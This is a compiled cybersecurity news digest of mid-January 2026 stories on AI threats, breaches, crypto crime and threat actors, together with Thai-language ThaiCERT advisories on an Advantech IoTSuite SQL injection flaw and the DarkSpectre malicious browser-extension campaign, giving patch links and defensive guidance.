  "The World Economic Forum's Global Cybersecurity Outlook 2026, written in collaboration with Accenture, examines the cybersecurity trends that will affect economies and societies in the year to come. The report explores how accelerating AI adoption, geopolitical fragmentation and widening cyber inequity are reshaping the global risk landscape. As attacks grow faster, more complex and more unevenly distributed, organizations and governments face rising pressure to adapt amid persistent sovereignty challenges and widening capability gaps. Drawing on leaders’ perspectives, the report provides actionable insights to inform strategy, investment and policy."
  https://www.weforum.org/publications/global-cybersecurity-outlook-2026/
  https://reports.weforum.org/docs/WEF_Global_Cybersecurity_Outlook_2026.pdf
  https://www.infosecurity-magazine.com/news/fraud-overtakes-ransomware-as-top/
• Cyber Insights 2026: What CISOs Can Expect In 2026 And Beyond
  "The responsibility of the CISO is ever increasing, and this won’t slow down in the coming years. Paul Kivikink, VP of product management and technology partnerships, at DataBee, explains the starting point: “Traditionally, CISOs came up through the technical ranks, deeply rooted in cybersecurity operations. But as cyber risk has become a board-level concern, the CISO is now expected to speak the language of business, connecting security investments to revenue protection, regulatory compliance, and enterprise resilience.”"
  https://www.securityweek.com/cyber-insights-2026-what-cisos-can-expect-in-2026-and-beyond/
• Block CISO: We Red-Teamed Our Own AI Agent To Run An Infostealer On An Employee Laptop
  "When it comes to security, AI agents are like self-driving cars, according to Block Chief Information Security Officer James Nettesheim. "It's not enough for self-driving cars to be just as good as humans," Nettesheim said in an exclusive interview with The Register. "They have to be safer and better than humans - and provably so. We need that with our agentic use, too." The parent company of Square, Cash App, and Afterpay is pushing hard to position itself as an AI leader, co-designing the Model Context Protocol (MCP) with Anthropic and using MCP to build Goose, its open source AI agent that's used by almost all Block's 12,000 employees and connects to all of the company's systems including Google accounts and Square payments."
  https://www.theregister.com/2026/01/12/block_ai_agent_goose/
• 2026 Crypto Crime Report Key Insights: TRM Identifies Record USD 158 Billion In Illicit Crypto Flows In 2025, Reversing a Multi-Year Decline
  "This blog features key highlights from TRM’s upcoming 2026 Crypto Crime Report. Be sure to check back in the coming weeks to get your complete copy. Illicit crypto volume reached an all-time high of USD 158 billion in 2025, up nearly 145% from 2024. Despite the increase in absolute illicit volume, illicit volume as a proportion of overall crypto volume fell in 2025, from 1.3% in 2024 to 1.2% in 2025. While illicit activity represented a small share of overall on-chain volume, illicit entities captured 2.7% of available crypto liquidity in 2025, using a new metric that frames risk relative to deployable capital rather than raw transaction volume."
  https://www.trmlabs.com/resources/blog/2026-crypto-crime-report-key-insights-trm-identifies-record-usd-158-billion-in-illicit-crypto-flows-in-2025-reversing-a-multi-year-decline
  https://www.infosecurity-magazine.com/news/illicit-crypto-activity-record/

อ้างอิง
Electronic Transactions Development Agency (ETDA)

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

รายละเอียดช่องโหว่
• CVE-2025-52694 เป็นช่องโหว่ที่มีระดับความรุนแรง วิกฤต (คะแนน CVSS Score 10.0) จัดอยู่ในประเภท SQL Injection ซึ่งเกิดจากความบกพร่องในการตรวจสอบและกรองข้อมูลนำเข้าที่ไม่เหมาะสมในผลิตภัณฑ์ Advantech IoTSuite / IoT Edge
• ระบบ Advantech IoTSuite / IoT Edge ที่เปิดให้เข้าถึงผ่านเครือข่ายภายนอก มีความเสี่ยงที่ผู้โจมตีจะส่งคำสั่งจากระยะไกลเพื่อโจมตีระบบได้ โดยไม่จำเป็นต้องผ่านการยืนยันตัวตน ผ่านการส่งคำสั่ง SQL ที่ถูกออกแบบมาเป็นพิเศษไปยังระบบฐานข้อมูล ซึ่งอาจนำไปสู่การเข้าถึงข้อมูลสำคัญ การแก้ไขหรือทำลายข้อมูล หรือการทำให้ระบบไม่สามารถให้บริการได้ตามปกติ

ผลิตภัณฑ์ที่ได้รับผลกระทบ
• Advantech IoTSuite SaaSComposer ก่อนเวอร์ชัน 3.4.15
• Advantech IoTSuite Growth Linux docker ก่อนเวอร์ชัน V2.0.2
• Advantech IoTSuite Starter Linux docker ก่อนเวอร์ชัน V2.0.2
• Advantech IoT Edge Linux docker ก่อนเวอร์ชัน V2.0.2
• Advantech IoT Edge Windows ก่อนเวอร์ชัน V2.0.2

1. แนวทางการตรวจสอบ
   • ตรวจสอบว่าหน่วยงานมีการใช้งานผลิตภัณฑ์ Advantech IoTSuite หรือ IoT Edge ในเวอร์ชันที่ได้รับผลกระทบหรือไม่
   • ตรวจสอบการเปิดให้บริการของระบบดังกล่าวว่ามีการเข้าถึงจากเครือข่ายภายนอกหรืออินเทอร์เน็ตสาธารณะหรือไม่
   • ตรวจสอบบันทึกเหตุการณ์ (Logs) ของระบบและฐานข้อมูล เพื่อค้นหาพฤติกรรมผิดปกติหรือความพยายามในการส่งคำสั่ง SQL ที่ผิดปกติ

2. แนวทางการป้องกัน
   • ดำเนินการ อัปเดตซอฟต์แวร์เป็นเวอร์ชันล่าสุด ที่ผู้พัฒนาได้แก้ไขช่องโหว่แล้ว
   • สำหรับ IoTSuite SaaSComposer, IoTSuite Growth (Linux Docker) และ IoT Edge (Windows) ขอแนะนำให้ ติดต่อบริษัท Advantech เพื่อขอรับข้อมูลและเวอร์ชันที่มีการแก้ไขช่องโหว่อย่างเป็นทางการ ตามรายละเอียดที่ระบุไว้ด้านล่าง

   • https://dg.th/v6ju5r8wxz
     • สำหรับ IoTSuite Starter (Linux Docker) ขอแนะนำให้ ดาวน์โหลดและติดตั้งแพตช์จาก Advantech ตามรายละเอียดที่ระบุไว้ด้านล่าง

• https://dg.th/cyof2tbkl3
  • สำหรับ IoT Edge (Linux Docker) ขอแนะนำให้ ดาวน์โหลดและติดตั้งแพตช์จาก Advantech ตามรายละเอียดที่ระบุไว้ด้านล่าง
• https://dg.th/wqx1o0y6r9

3. มาตรการชั่วคราว (กรณียังไม่สามารถอัปเดตได้ทันที)
   • ปิดหรือจำกัดการเข้าถึงบริการที่ได้รับผลกระทบจากเครือข่ายสาธารณะ
   • ใช้มาตรการ Firewall หรือ Web Application Firewall (WAF) เพื่อกรองคำร้องขอที่มีลักษณะผิดปกติ
   • เฝ้าระวังและติดตามเหตุการณ์ด้านความมั่นคงปลอดภัยไซเบอร์อย่างใกล้ชิด
   อ้างอิง
   https://www.csa.gov.sg/alerts-and-advisories/alerts/alerts-al-2026-001/
   https://nvd.nist.gov/vuln/detail/CVE-2025-52694

ThaiCERT ขอแนะนำให้ผู้ใช้งานและผู้ดูแลระบบที่ใช้งานผลิตภัณฑ์ดังกล่าว รีบดำเนินการตรวจสอบและอัปเดตเป็นเวอร์ชันล่าสุดทันที เพื่อลดความเสี่ยงจากการโจมตีและป้องกันความเสียหายที่อาจเกิดขึ้น

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

Healthcare Sector

• Healthcare Chatbots Provoke Unease In AI Governance Analysts
  "When an AI chatbot tells people to add glue to pizza, the error is obvious. When it recommends eating more bananas - sound nutritional advice that could be dangerous for someone with kidney failure - the mistake hides in plain sight. That's a risk now poised to reach hundreds of millions of users with little or no regulatory oversight. OpenAI days ago launched ChatGPT Health, allowing users to connect medical records and wellness apps for personalized health guidance."
  https://www.bankinfosecurity.com/healthcare-chatbots-provoke-unease-in-ai-governance-analysts-a-30483

Vulnerabilities

• CISA Retires Ten Emergency Directives, Marking An Era In Federal Cybersecurity
  "Today, the Cybersecurity and Infrastructure Security Agency (CISA) announced the successful retirement of ten Emergency Directives issued between 2019-2024. Marking a significant milestone in federal cybersecurity, this is the highest number of Emergency Directives retired by the agency at one time. These directives achieved their mission to mitigate urgent and imminent risks to Federal Civilian Executive Branch (FCEB) agencies. Since their issuance, CISA has partnered closely with federal agencies to drive remediation, embed best practices and overcome systemic challenges - establishing a stronger, more resilient digital infrastructure for a more secure America."
  https://www.cisa.gov/news-events/news/cisa-retires-ten-emergency-directives-marking-era-federal-cybersecurity
  https://thehackernews.com/2026/01/cisa-retires-10-emergency-cybersecurity.html
  https://www.bleepingcomputer.com/news/security/cisa-retires-10-emergency-cyber-orders-in-rare-bulk-closure/
  https://www.securityweek.com/cisa-closes-10-emergency-directives-as-vulnerability-catalog-takes-over/

Malware

• Threat Actors Actively Targeting LLMs
  "Our Ollama honeypot infrastructure captured 91,403 attack sessions between October 2025 and January 2026. Buried in that data: two distinct campaigns that reveal how threat actors are systematically mapping the expanding surface area of AI deployments. GreyNoise customers have received an Executive Situation Report (SITREP) including IOCs and other valuable intelligence from this investigation. Customers, please check your inbox."
  https://www.greynoise.io/blog/threat-actors-actively-targeting-llms
  https://www.bleepingcomputer.com/news/security/hackers-target-misconfigured-proxies-to-access-paid-llm-services/
• GRU-Linked BlueDelta Evolves Credential Harvesting
  "Between February and September 2025, Recorded Future’s Insikt Group identified multiple credential-harvesting campaigns conducted by BlueDelta, a Russian state-sponsored threat group associated with the Main Directorate of the General Staff of the Armed Forces of the Russian Federation (GRU). This activity represents an expansion of BlueDelta’s ongoing credential-theft operations previously detailed in Insikt Group’s December 2025 report."
  https://www.recordedfuture.com/research/gru-linked-bluedelta-evolves-credential-harvesting
  https://assets.recordedfuture.com/insikt-report-pdfs/2026/cta-ru-2026-0107.pdf
  https://www.darkreading.com/cyberattacks-data-breaches/russian-apt-credentials-global-targets
  https://thehackernews.com/2026/01/russian-apt28-runs-credential-stealing.html
• Reborn In Rust: Muddy Water Evolves Tooling With RustyWater Implant
  "CloudSEK’s TRIAD recently identified a spearphishing campaign attributed to the Muddy Water APT group targeting multiple sectors across the Middle East, including diplomatic, maritime, financial, and telecom entities. The campaign uses icon spoofing and malicious Word documents to deliver Rust based implants capable of asynchronous C2, anti-analysis, registry persistence, and modular post-compromise capability expansion. Historically, Muddy Water has relied on PowerShell and VBS loaders for initial access and post-compromise operations. The introduction of Rust-based implants represents a notable tooling evolution toward more structured, modular, and low noise RAT capabilities."
  https://www.cloudsek.com/blog/reborn-in-rust-muddywater-evolves-tooling-with-rustywater-implant
  https://thehackernews.com/2026/01/muddywater-launches-rustywater-rat-via.html

Breaches/Hacks/Leaks

• BreachForums Hacking Forum Database Leaked, Exposing 324,000 Accounts
  "The latest incarnation of the notorious BreachForums hacking forum has suffered a data breach, with its user database table leaked online. BreachForums is the name of a series of hacking forums used to trade, sell, and leak stolen data, as well as sell access to corporate networks and other illegal cybercrime services. The site was launched after the first of these forums, RaidForums, was seized by law enforcement, with the owner, "Omnipotent", arrested."
  https://www.bleepingcomputer.com/news/security/breachforums-hacking-forum-database-leaked-exposing-324-000-accounts/
  https://hackread.com/breachforums-database-users-leak-admin-disputes/
• Hacker Behind Wired.com Leak Now Selling Full 40M Condé Nast Records
  "A hacker using the alias “Lovely” is selling nearly 40 million (39,970,158) Condé Nast user records that allegedly belong to the company’s subsidiary websites, many of which rank among the most popular sites worldwide. On December 27, 2025, Hackread.com reported that a hacker using the alias “Lovely” leaked a database containing the personal details of 2.3 million Wired.com users. Wired.com is a major American magazine and website owned by Condé Nast. Alongside the download link, the hacker accused Condé Nast of ignoring repeated security warnings. Three days after the Wired.com leak, the hacker announced that the entire Condé Nast dataset was being put up for sale."
  https://hackread.com/wired-com-hacker-data-leak-conde-nast-records/
• Instagram Denies Breach Amid Claims Of 17 Million Account Data Leak
  "Instagram says it fixed a bug that allowed threat actors to mass-request password reset emails, amid claims that data from more than 17 million Instagram accounts was scraped and leaked online. "We fixed an issue that allowed an external party to request password reset emails for some Instagram users," a Meta spokesperson told BleepingComputer. "We want to reassure everyone there was no breach of our systems and people's Instagram accounts remain secure. People can disregard these emails and we apologize for any confusion this may have caused.""
  https://www.bleepingcomputer.com/news/security/instagram-denies-breach-amid-claims-of-17-million-account-data-leak/
  https://thecybersecguru.com/news/instagram-data-breach-17-million/
  https://securityaffairs.com/186765/data-breach/a-massive-breach-exposed-data-of-17-5m-instagram-users.html
  https://hackread.com/instagram-user-data-leak-scraped-records-2022/
  https://www.theregister.com/2026/01/11/infosec_news_in_brief/
• At Least $26 Million In Crypto Stolen From Truebit Platform As Crypto Crime Landscape Evolves
  "Hackers stole more than $26 million worth of cryptocurrency from the Truebit platform on Thursday, marking the first major crypto hack of 2026. The company said in a statement that it became aware of a security incident “involving one or more malicious actors.” “We are in contact with law enforcement and taking all available measures to address the situation,” Truebit said, urging people not to interact with the smart contract that had been affected by the attack."
  https://therecord.media/26-million-in-crypto-stolen-truebit
• Salt Typhoon Hackers Hit Congressional Emails In New Breach
  "U.S. officials are investigating a suspected Chinese cyber espionage operation compromising email systems used by congressional staff working on House national security committees. The activity, detected in December, appears to have originated from the threat actor commonly tracked as Salt Typhoon, according to researchers tracking the operation. It appears to have affected staff supporting committees with oversight of China policy, foreign affairs, intelligence and the military (see: Chinese Data Leak Reveals Salt Typhoon Contractors)."
  https://www.bankinfosecurity.com/salt-typhoon-hackers-hit-congressional-emails-in-new-breach-a-30484

General News

• 34 Arrests In Spain During Action Against The ‘Black Axe’ Criminal Organisation
  "The Spanish National Police (Policía Nacional), in close cooperation with the Bavarian State Criminal Police Office (Bayerisches Landeskriminalamt) and with the support of Europol, has conducted an operation against the international criminal organisation ‘Black Axe’. The action resulted in 34 arrests and significant disruptions to the group's activities. Black Axe is a highly structured, hierarchical group with its origins in Nigeria and a global presence in dozens of countries. The core group of arrested suspects consists of 10 individuals of Nigerian nationality."
  https://www.europol.europa.eu/media-press/newsroom/news/34-arrests-in-spain-during-action-against-black-axe-criminal-organisation
  https://www.bleepingcomputer.com/news/security/spain-arrests-34-suspects-linked-to-black-axe-cyber-crime/
  https://thehackernews.com/2026/01/europol-arrests-34-black-axe-members-in.html
  https://www.infosecurity-magazine.com/news/europol-crackdown-on-black-axe/
  https://hackread.com/europol-black-axe-cybercrime-ring-spain/
• Identity & Beyond: 2026 Incident Response Predictions
  "In 2026, incident response (IR) will continue its shift away from traditional malware-centric investigations toward identity-driven intrusions, abuse of trusted cloud services, and low-signal, high-impact activity that blends seamlessly into normal business operations. Rather than relying on technical exploits, threat actors are prioritizing legitimate access, persistence, and operational efficiency, enabling them to evade users, security controls, and automated detection."
  https://www.cybereason.com/blog/identity-beyond-2026-incident-response-predictions
• Crypto Crime Reaches Record High In 2025 As Nation‑State Sanctions Evasion Moves On‑Chain At Scale
  "In 2025, we tracked a notable rise in nation-state activity in crypto, marking the latest phase in the maturation of the illicit on-chain ecosystem. Over the past few years, the crypto crime landscape has become increasingly professionalized; illicit organizations now operate large-scale on-chain infrastructure to help transnational criminal networks procure goods and services and launder their ill-gotten crypto. Against that backdrop, we have seen nation-states moving into this space, both by tapping into these same professionalized service providers and by standing up their own bespoke infrastructure to evade sanctions at scale."
  https://www.chainalysis.com/blog/2026-crypto-crime-report-introduction/
  https://www.darkreading.com/cyber-risk/illicit-crypto-economy-surges-nation-states
• How AI Agents Are Turning Security Inside-Out
  "AppSec teams have spent the last decade hardening externally facing applications, API security, software supply chain risk, CI/CD controls, and cloud-native attack paths. But a growing class of security threats is emerging from a largely underestimated and undefended source: internally built no-code assets."
  https://www.helpnetsecurity.com/2026/01/09/ai-agents-appsec-risk/
• Security Teams Are Paying More Attention To The Energy Cost Of Detection
  "Security teams spend a lot of time explaining why detection systems need more compute. Cloud bills rise, models retrain more often, and new analytics pipelines get added to existing stacks. Those conversations usually stay focused on coverage and accuracy. A recent study takes a different approach by measuring anomaly detection models alongside their energy use and associated carbon output, treating compute consumption as part of security operations."
  https://www.helpnetsecurity.com/2026/01/09/energy-aware-cybersecurity-ai-research/
• Wi-Fi Evolution Tightens Focus On Access Control
  "Wi-Fi networks are taking on heavier workloads, more devices, and higher expectations from users who assume constant access everywhere. A new Wireless Broadband Alliance industry study shows that this expansion is reshaping priorities around security, identity, and trust, alongside adoption of new Wi-Fi standards."
  https://www.helpnetsecurity.com/2026/01/09/wba-wi-fi-access-control/

อ้างอิง
Electronic Transactions Development Agency (ETDA)

ศูนย์ประสานการรักษาความมั่นคงปลอดภัยระบบคอมพิวเตอร์แห่งชาติ (ThaiCERT) ได้ติดตามสถานการณ์ภัยคุกคามทางไซเบอร์ และพบข้อมูลเกี่ยวกับแคมเปญมัลแวร์ DarkSpectre ซึ่งแฝงตัวผ่านส่วนขยายเบราว์เซอร์ที่มีลักษณะเสมือนถูกต้องตามกฎหมาย

หากผู้ใช้งานติดตั้งหรือเปิดใช้งานส่วนขยายที่ได้รับผลกระทบ อาจทำให้ผู้ไม่หวังดีสามารถฝังโค้ดอันตราย ดาวน์โหลดเพย์โหลดเพิ่มเติมจากเซิร์ฟเวอร์ควบคุม (Command and Control: C2) และเข้าควบคุมอุปกรณ์จากระยะไกล ส่งผลกระทบต่อความมั่นคงปลอดภัยของระบบสารสนเทศของหน่วยงานและองค์กรได้

1. รายละเอียดภัยคุกคาม

1.1 นักวิจัยด้านความมั่นคงปลอดภัยไซเบอร์จากบริษัท Koi ตรวจพบและเปิดเผยแคมเปญมัลแวร์ DarkSpectre ซึ่งเป็นปฏิบัติการโจมตีขนาดใหญ่
1.2 DarkSpectre ใช้ส่วนขยายเบราว์เซอร์ยอดนิยมเป็นช่องทางในการแฝงตัวและแพร่กระจาย บนเบราว์เซอร์ Google Chrome, Microsoft Edge และ Mozilla Firefox
1.3 แคมเปญดังกล่าวถูกตรวจพบครั้งแรกระหว่างการสืบสวนแคมเปญ ShadyPanda และส่งผลกระทบต่ออุปกรณ์มากกว่า 4 ล้านเครื่องทั่วโลก
1.4 มัลแวร์ถูกออกแบบให้เริ่มทำงานภายหลัง โดยอาศัยโค้ด JavaScript ที่ซ่อนอยู่ เพื่อดึงเพย์โหลดอันตรายจาก C2 เซิร์ฟเวอร์

2. ภาพรวมของภัยคุกคาม (Overview)

2.1 ประเภทภัยคุกคาม: Malware Campaign via Malicious Browser Extensions
2.2 เทคนิคการโจมตี: ใช้ส่วนขยายที่ดูเหมือนถูกต้องตามกฎหมาย สามารถแฝงโค้ด JavaScript เพื่อทำงานภายหลัง จากนั้น ทำการติดต่อกับ C2 เซิร์ฟเวอร์เพื่อรับคำสั่งเพิ่มเติม
2.3 ผู้โจมตีไม่จำเป็นต้องเข้าถึงระบบโดยตรง เพียงผู้ใช้ติดตั้งส่วนขยาย ก็อาจถูกโจมตีได้
2.4 ระบบที่ได้รับผลกระทบ: อุปกรณ์ผู้ใช้งานที่ติดตั้งส่วนขยายบน Chrome, Edge และ Firefox

3. ผลกระทบ หากแคมเปญ DarkSpectre ถูกโจมตีสำเร็จ อาจส่งผลดังนี้:
   3.1 อุปกรณ์ผู้ใช้งานถูกฝังมัลแวร์โดยไม่รู้ตัว
   3.2 ดาวน์โหลดและรันโค้ดอันตรายเพิ่มเติมจากระยะไกล
   3.3 ถูกควบคุมอุปกรณ์ผ่าน C2 เซิร์ฟเวอร์
   3.4 ข้อมูลส่วนบุคคลและข้อมูลองค์กรรั่วไหล
   3.5 ใช้อุปกรณ์เป็นฐานโจมตีระบบอื่นภายในเครือข่าย (Lateral Movement)

4. รายชื่อส่วนขยายเบราว์เซอร์ที่เกี่ยวข้อง

• Chrome Audio Capture
• ZED: Zoom Easy Downloader
• X (Twitter) Video Downloader
• Google Meet Auto Admit
• Zoom.us Always Show "Join From Web"
• Timer for Google Meet
• CVR: Chrome Video Recorder
• GoToWebinar & GoToMeeting Download Recordings
• Meet Auto Admit
• Google Meet Tweak (Emojis, Text, Cam Effects)
• Mute All on Meet
• Google Meet Push-To-Talk
• Photo Downloader for Facebook, Instagram
• Zoomcoder Extension
• Auto-join for Google Meet
• Edge Audio Capture (Edge)
• Twitter X Video Downloader (Firefox)
• New Tab – Customized Dashboard (Edge)
• "Google Translate" by charliesmithbons

5. แนวทางป้องกันและลดความเสี่ยง (Mitigation – Recommended)

5.1 ตรวจสอบและถอนการติดตั้ง (Remove) ส่วนขยายเบราว์เซอร์ที่ไม่จำเป็นหรือมีความเสี่ยง
5.2 อนุญาตให้ติดตั้งส่วนขยายเฉพาะที่ผ่านการอนุมัติจากหน่วยงาน (Extension Whitelisting)
5.3 อัปเดตเบราว์เซอร์และระบบปฏิบัติการให้เป็นเวอร์ชันล่าสุด
5.4 สแกนอุปกรณ์ด้วยโปรแกรมป้องกันมัลแวร์ที่เชื่อถือได้

6. แนวทางเฝ้าระวังเพิ่มเติม

6.1 ตรวจสอบ Log การใช้งานเบราว์เซอร์และทราฟฟิกเครือข่ายที่ผิดปกติ
6.2 เฝ้าระวังการติดต่อไปยัง C2 เซิร์ฟเวอร์ที่ไม่รู้จัก
6.3 ตรวจสอบการเรียกใช้งานบริการตรวจสอบ IP ภายนอก เช่น ipinfo.io ซึ่งอาจเป็นตัวบ่งชี้พฤติกรรมของมัลแวร์
6.4 แจ้งเตือนผู้ใช้งานให้หลีกเลี่ยงการติดตั้งส่วนขยายจากแหล่งที่ไม่น่าเชื่อถือ

7. คำแนะนำด้านความปลอดภัยเพิ่มเติม (Security Hardening)

7.1 กำหนดนโยบายควบคุมการใช้งานส่วนขยายเบราว์เซอร์ในองค์กร
7.2 แยกสิทธิ์ผู้ใช้งานทั่วไปออกจากสิทธิ์ผู้ดูแลระบบ
7.3 สำรองข้อมูลสำคัญอย่างสม่ำเสมอ
7.4 จัดอบรมให้ความรู้ผู้ใช้งานเกี่ยวกับภัยคุกคามจาก Browser Extension

แหล่งอ้างอิง (References)
https://www.techspot.com/news/110779-darkspectre-quietly-infected-millions-through-seemingly-legit-browser.html

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand